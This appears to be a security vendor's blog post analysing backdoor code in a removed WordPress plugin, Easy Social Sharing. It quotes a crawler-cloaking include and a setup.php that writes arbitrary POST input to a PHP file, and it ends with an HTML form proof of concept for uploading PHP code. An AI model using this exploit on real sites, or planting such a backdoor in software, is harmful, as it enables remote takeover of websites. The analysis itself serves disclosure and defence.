One of the things we do to make sure our customers have the best data on vulnerabilities in WordPress plugins is to monitor third party data on hacking attempts. Through that we recently came across a request for a file, /wp-content/plugins/social-sharing/js/admin.js, from the plugin Easy Social Sharing, not to be confused with another Easy Social Sharing. That plugin is no longer in the WordPress Plugin Directory, which could have been due to it being removed for a security issue.

What we found when looking into this shows one problem that there is when trying to find a vulnerability that hackers might be targeting in a plugin, the vulnerabilities they target don’t always exist. Strangely it looks like some hackers don’t actual test out vulnerabilities before trying to exploit them on a large scale. For example, last April we looked at one instance where a fairly obvious false report of a vulnerability still lead to exploitation attempts. In this case the vulnerability actually exists, it just would usually not be exploitable, which we will get to in a moment.

In the case of this plugin it looks like the vulnerability was actually part of intentionally malicious code. In the file /easy-social-sharing.php the addsharehead() function is registered to run wp_head() is run in a theme:

25

add_action('wp_head', 'addsharehead');

That function will include the file /wp-content/plugins/social-sharing/install.php if it exists and the request is coming from a search engine’s crawler (this would allow for serving cloaked content):

51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66

function addsharehead() {
 
$filename = ($_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/social-sharing/install.php');
 
if (file_exists($filename)) {
 
    if(eregi("slurp|bingbot|googlebot",$_SERVER['HTTP_USER_AGENT'])) { 
 
include($_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/social-sharing/install.php');
 
}
 else { };
 
} else {
 
}

The file /setup.php is intended to create the install.php file:

2
3
4
5
6
7
8
9

session_start();
$easyshareinstall = $_POST['newins'];
$fp = fopen($_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/easy-social-sharing/install.php', 'w');
$easyshareinstall = str_replace('\\', '', $easyshareinstall);
$easyshareinstall = htmlentities($easyshareinstall);
fwrite($fp, html_entity_decode($easyshareinstall));
fclose($fp);
echo $easyshareinstall;

A request sent to that file creates a file named install.php with the content of the POST input “newins”, since the file has .php extension that is a remote code execution vulnerability. There is a problem that we noticed when we went to check to make sure that the vulnerability was actually exploitable.

When sent a request that should have caused the file to be created, it didn’t get created. Looking closer at the code we noticed the problem, the directory of the plugin is “social-sharing”, while the code tries to create it in the directory “easy-social-sharing”. The function used to create the file fopen() will not create a directory that doesn’t exist, so the code will only work in you already have a directory with that name already in the “wp-content/plugins/”. So unless you also had the other plugin that shares it name or for some other reason have a directory with that name, the vulnerability won’t work.

Proof of Concept

The following proof of concept will place the specified PHP code in to the file install.php in the directory /wp-content/plugins/easy-social-sharing/ if that directory already exists.

Make sure to replace “[path to WordPress]” with the location of WordPress and “[PHP code]” with the PHP code you want in the uploaded file.

<html>
<body>
<form action="http://[path to WordPress]/wp-content/plugins/social-sharing/setup.php" method="POST">
<input type="hidden" name="newins" value="[PHP code]" />
<input type="submit" value="Submit" />
</form>
</body>
</html>